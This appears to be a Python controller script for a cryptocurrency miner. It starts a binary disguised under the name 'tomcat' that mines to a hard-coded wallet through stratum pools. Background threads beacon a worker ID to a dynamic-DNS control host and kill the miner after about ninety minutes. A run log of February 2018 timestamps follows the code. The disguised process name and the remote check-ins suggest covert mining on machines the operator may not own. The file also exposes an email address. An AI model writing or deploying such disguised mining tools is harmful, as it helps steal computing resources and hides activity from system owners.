import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:06.116053
#2018-02-17 16:33:04.364936
#2018-02-17 18:21:01.965003
#2018-02-17 20:09:07.024557
#2018-02-17 21:56:04.425521
#2018-02-17 23:41:05.727405
#2018-02-18 01:31:01.588090
#2018-02-18 03:17:01.890282
#2018-02-18 05:06:05.418788
#2018-02-18 06:59:04.434831
#2018-02-18 08:47:02.190115
#2018-02-18 10:34:03.743853
#2018-02-18 12:19:05.182858
#2018-02-18 14:06:01.928178
#2018-02-18 15:55:06.049035
#2018-02-18 17:44:05.411834
#2018-02-18 19:32:04.681436
#2018-02-18 21:17:03.649281
#2018-02-18 23:04:06.496668
#2018-02-19 00:51:04.703394
#2018-02-19 02:38:04.088789
#2018-02-19 04:24:07.352178
#2018-02-19 06:09:07.644212
#2018-02-19 07:57:05.166787
#2018-02-19 09:49:02.145402
#2018-02-19 11:37:07.073462
#2018-02-19 13:24:08.039716
#2018-02-19 15:13:04.542424
#2018-02-19 17:01:07.338214
#2018-02-19 18:48:03.928322
#2018-02-19 20:37:01.250148
#2018-02-19 22:25:08.451123
#2018-02-20 00:11:05.232561
#2018-02-20 01:58:07.271448
#2018-02-20 03:48:06.722549
#2018-02-20 05:32:01.434773
#2018-02-20 07:16:08.339916
#2018-02-20 09:03:05.977473
#2018-02-20 10:46:03.816502
#2018-02-20 12:33:01.720471
#2018-02-20 14:19:04.247380
#2018-02-20 16:02:07.573518
#2018-02-20 17:50:03.863719
#2018-02-20 19:41:04.002214
#2018-02-20 21:29:06.818479
#2018-02-20 23:13:02.131564
#2018-02-21 00:58:01.670673
#2018-02-21 02:43:06.726428
#2018-02-21 04:33:05.040025
#2018-02-21 06:21:05.183776
#2018-02-21 08:05:08.383241
#2018-02-21 09:50:10.707972
#2018-02-21 11:40:11.999312
#2018-02-21 13:31:06.845972
#2018-02-21 15:16:06.432801
#2018-02-21 17:07:13.101227
#2018-02-21 18:54:04.394962
#2018-02-21 20:44:01.362055
#2018-02-21 22:29:06.804449
#2018-02-22 00:19:04.181381
#2018-02-22 02:06:05.765375
#2018-02-22 03:53:04.571174
#2018-02-22 05:40:08.682364
#2018-02-22 07:25:06.259395
#2018-02-22 09:13:01.354630
#2018-02-22 11:00:06.508045
#2018-02-22 12:46:09.216725
#2018-02-22 14:32:04.995561
#2018-02-22 16:19:09.756177
#2018-02-22 18:05:10.532552
#2018-02-22 19:54:05.259650
#2018-02-22 21:43:06.230811
#2018-02-22 23:31:07.304509
#2018-02-23 01:19:05.411487
#2018-02-23 03:06:04.125411
#2018-02-23 04:52:08.028699
#2018-02-23 06:39:01.498397
#2018-02-23 08:27:01.558861
#2018-02-23 10:43:07.754988
#2018-02-23 12:40:12.855171
#2018-02-23 14:26:05.529394
#2018-02-23 16:18:06.372635
#2018-02-23 18:04:07.685115
#2018-02-23 19:50:01.498773
#2018-02-23 21:35:09.649209
#2018-02-23 23:24:06.537582
#2018-02-24 01:17:07.063368
#2018-02-24 03:08:06.030157
#2018-02-24 04:54:04.709383
#2018-02-24 06:39:07.225158
#2018-02-24 08:28:05.503348
#2018-02-24 10:14:03.774786
#2018-02-24 12:08:06.111920
#2018-02-24 13:54:07.290730
#2018-02-24 15:46:07.301824
#2018-02-24 17:44:01.696202
#2018-02-24 19:32:05.066931
#2018-02-24 21:20:07.556756
#2018-02-24 23:59:01.418985
#2018-02-25 04:23:06.571389
#2018-02-25 07:54:06.060793